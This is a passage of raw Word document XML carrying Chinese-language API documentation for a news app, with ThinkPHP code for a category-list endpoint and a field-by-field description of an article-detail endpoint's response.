      </w:r>
    </w:p>
    <w:p w14:paraId="6F79F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获得分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358ED6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43C066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7328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7E23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{Object[]} data      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C089F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{Number} data.id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D094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data.title  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F07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B1E3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typeid() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B779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25915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$request-&gt;param('id') ? $request-&gt;param('id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D92C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$request-&gt;param('limit') ? $request-&gt;param('limit') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9176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 $request-&gt;param('mychannel') ? $request-&gt;param('mychannel') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298762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$tid = $request-&gt;param('tid') ? $request-&gt;param('tid') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2F6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 = $request-&gt;param('field') ? $request-&gt;param('field') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D577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5EC257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['&gt;', 1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6099DE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09E6CF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['in', $id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B5A3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41C3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F00A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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD42E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10B1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($tid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7228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$where['tid'] = ['in', $tid];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25939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1EEE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 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE02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'hide desc,des desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A86A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009B1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'hide desc,des desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF6B3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3EFE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 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A97D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$where['tid'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138F0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689B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$field .= $field ? ',id,title,app' : 'id,title,app';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832FC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Db::name('typeid')-&gt;where($where)-&gt;order($order)-&gt;limit($limit)-&gt;field($field)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17083B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9F9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781233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43D1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$datas['0'] = ['id' =&gt; 999999999, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD358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$datas['1'] = ['id' =&gt; 0, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE76F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$datas['2'] = ['id' =&gt; 888888888, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7B9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$datas['3'] = ['id' =&gt; 777777777, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E4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array_merge($datas, $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE315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B7AE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9D59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$fff=_moban();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557BA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if($fff=='toutiao'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04394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$fff='#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DE3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if($fff=='qutoutiao'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA62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$fff='#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771F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AFF3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$fff='#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93B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9740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 = $data_no = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98CF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$i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236FFE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$s=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70C8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73D729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if($v['app'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D71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$data_no[$i]['id']      = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F59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$data_no[$i]['title']   = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7A9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($field) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2159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(strstr($field, "create_time")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63818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$data_no[$i]['create_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3ADC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3A8D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4513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$data_no[$i]['create_time'] = date('m-d H:i', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1179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7A73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 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC03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$data_no[$i]['bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB02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$data_no[$i]['bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95F5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0013A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$data_no[$i]['bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B6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$data_no[$i]['bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD9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$data_no[$i]['size']['w'] = $this-&gt;typeSize($v['title']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659444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1E13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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D468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FBE59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$data_yes[$s]['id']      = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476B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$data_yes[$s]['title']   = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965A4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($field) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B51B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(strstr($field, "create_time")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79861D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$data_yes[$s]['create_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F6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6CA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(strstr($field, "id")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C79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$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0EAA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AB61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0D579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$data_yes[$s]['create_time'] = date('m-d H:i', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891E2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$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBAA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02F3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 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F29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$data_yes[$s]['bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730322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$data_yes[$s]['bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A564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BA5A7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$data_yes[$s]['bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D13BD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$data_yes[$s]['bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A5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$data_yes[$s]['size']['w'] = $this-&gt;typeSize($v['title']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA82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AB6D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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A358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7612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C152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$md5 = md5(json_encode($data_yes));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448EDB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8A46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$kong['id'] = '555555555';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFB4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$kong['title'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B720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$kong['bg'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A15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$kong['bgSelected'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E4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$kong['size'] = ['w'=&gt;'100'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497D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$data_yes[count($data_yes)] = $kong;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A48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D34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['data' =&gt; $data_yes, 'typeid' =&gt; $typeid , 'no' =&gt; $data_no, 'md5' =&gt; $md5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DA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494CE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53EF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typeSize($title = '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A20E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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8FAA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50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11875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9B4B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$size = ceil(strlen($title) * 8.3333333);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B27D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$size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01814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948C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videoTypeid() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EFF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71EB82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$where['tid'] = 132;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FFDE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Db::name('typeid')-&gt;where($where)-&gt;order('hide desc, des desc')-&gt;field('title,id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0186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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B30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$datas['0'] = ['id' =&gt; 0, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全部</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC9D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array_merge($datas, $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73171D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58D06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$data[$k]['bg'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E735A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$data[$k]['bgSelected'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B51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$typeid[$k] = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B10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9BC1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['data' =&gt; $data, 'typeid' =&gt; $typeid];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E544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json($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F2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9EF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7F9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/api/article/view </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F873F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资讯详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B77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714CE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D8051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D263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584317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id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA47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FD2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id</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资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0BE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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9A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flags</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，英文逗号分隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2957D4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tags</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AB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image</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>封面图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D31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typeid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D0B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click</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1220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description</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E4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create_time</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>格式是时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFFBC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update_time</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后更新时间，格式是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> “*</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC5E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯正文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503FA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url</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跳转连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADF9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source</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯来源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214417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uid</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资讯发表用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F74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writer</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F452B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zan</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赞的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B98D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cai</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踩的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72292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pingNum</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5CA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share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D9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images_list </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图片数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717FD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pingNum</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DA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userImg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者的头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B30A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userUsername </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者的名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A3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user_guanzhu_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者的关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698867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user_article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者发表的文章数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FFE2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userZan          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已赞改文章：</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639A53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userCai          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已踩该文章：</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290D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userGuanzhu      </w:t>
      </w:r>
